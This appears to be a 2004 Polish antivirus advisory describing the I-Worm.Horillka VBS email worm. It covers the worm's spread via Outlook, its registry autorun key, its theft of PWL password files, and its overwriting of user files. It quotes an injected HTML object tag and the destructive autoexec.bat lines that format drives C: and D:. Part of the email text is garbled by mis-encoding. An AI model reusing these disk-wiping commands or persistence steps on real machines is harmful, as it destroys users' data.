2 kwietnia 2004

I-Worm.Horillka - usuwa, nadpisuje i formatuje

Jest to robak rozprzestrzeniający się przez internet jako załącznik zainfekowanych wiadomości e-mail. Ma postać zaszyfrowanego skryptu VBS o rozmiarze 25 562 bajtów.

Po uruchomieniu robak deszyfruje własny kod, kopiuje się do foldera systemowego Windows z nazwą WinSys32dll.vbs i tworzy w rejestrze klucz autorun:

HKLM\Software\Microsoft\Windows\
CurrentVersion\Run\WinSys32dll

Szkodnik rozsyła się do wszystkich użytkowników zapisanych w książce adresowej programu Microsoft Outlook.

Zainfekowane wiadomości e-mail

  • Temat:
    ÷ÎÉÍÁÎÉA!
  • Treść:
    ÷U?OÝAÎI ÎI×IA vbs IÂÎI×IAÎÉA ÄIN 
    ?IÉÓËÁ ×ÉOOÓI× × ?ÁÍNÔÉ ió Windows!
    iÎI ?IÍIÇÁAÔ ÂIOIÔOÓN Ó ×ÉOOÓÁÍÉ, 
    OÁÓÓUIÁAÝÉÍÉÓN ?I ?I?ÔA.
    áÎÔÉ×ÉOOÓÎUE ÍIÄOIO ÎÁ?ÉÓÁÎ ÎÁ 
    ÓËOÉ?Ô-NÚUËA, ?ÔI ?IÍIÇÁAÔ ?AOAE×ÁÔU×ÁÔO
    vb É js ×ÉOOÓU, ?OAÖÄA ?AÍ IÎÉ ÎÁ?ÎOÔ 
    ÄAÓÔOOËÔÉ×ÎOA ÄANÔAIOÎIÓÔO.
    äIÓÔÁÔI?ÎI IÔËOUÔO AÁEI É ?OIÇOÁÍÍÁ 
    ?I OÓÔOÁÎAÎÉA ×ÉOOÓI× ?OI×AÄAÔ ?IÉÓË
    ×OAÄIÎIÓÎUE ?OIÇOÁÍÍ × ?ÁÍNÔÉ ËIÍ?OAÔAOÁ.
  • Nazwa załącznika: WinSys32.dll.vbs

Po rozpropagowaniu własnych kopii robak wysyła do swojego autora wiadomość e-mail zawierającą w załączniku wszystkie pliki PWL (zawierające hasła) znalezione w folderze Windows zainfekowanego komputera.

Szkodnik kopiuje się z nazwą Folderdll.vbs na wszystkie dostępne dyski do wszystkich folderów. Kopie te oznaczone są jako pliki ukryte.

Robak wykonuje różne operacje na następujących plikach:

  • VBS - szkodnik nadpisuje pliki własną kopią są kopią szkodnika
  • JPG, JPEG, GIF, BMP - szkodnik nadpisuje te pliki obrazkiem GIF znajdującym się w jego kodzie
  • HTM, HTML - szkodnik dodaje do tych plikow następujący kod:

    <object id='test' data='#' width='100%' height='100%' type='text/x-scriptlet' VIEWASTEXT </object>

  • AVC - szkodnik nadpisuje te pliki tekstem Vyatka was here
  • TXT, DOC - szkodnik nadpisuje te pliki następującym tekstem:
    o×ÁÖÁAÍUA ÇIÓ?IÄÁ! ÷ÁÓ EÁËÎOI ×ÉOOÓ 
    ÉÚ ÷NÔËÉ - ÚÁÄÎÉAU oIÓÓÉÉ.
    Dear friends! You was hacked by virus 
    from Vyatka (situated in deep ass of Russia)
    ..:: Xpi1oT ::..

  • MP3, WAV - szkodnik nadpisuje te pliki dźwiękami znajdującymi się w jego kodzie
  • DBF - szkodnik usuwa te pliki

11 grudnia każdego roku robak wyświetla na ekranie zainfekowanego komputera nastepujący komunikat:

COOOOOOOOL

i nadpisuje plik autoexec.bat następującymi komendami:

@Windows upgrading your system...
@Please wait
format c: /autotest /q /u
@Please wait...
format d: /autotest /q /u
@Your system was hacked by virus 
from Vyatka (situated in deep ass of Russia)

W rezultacie po restarcie komputera formatowane są dyski twarde.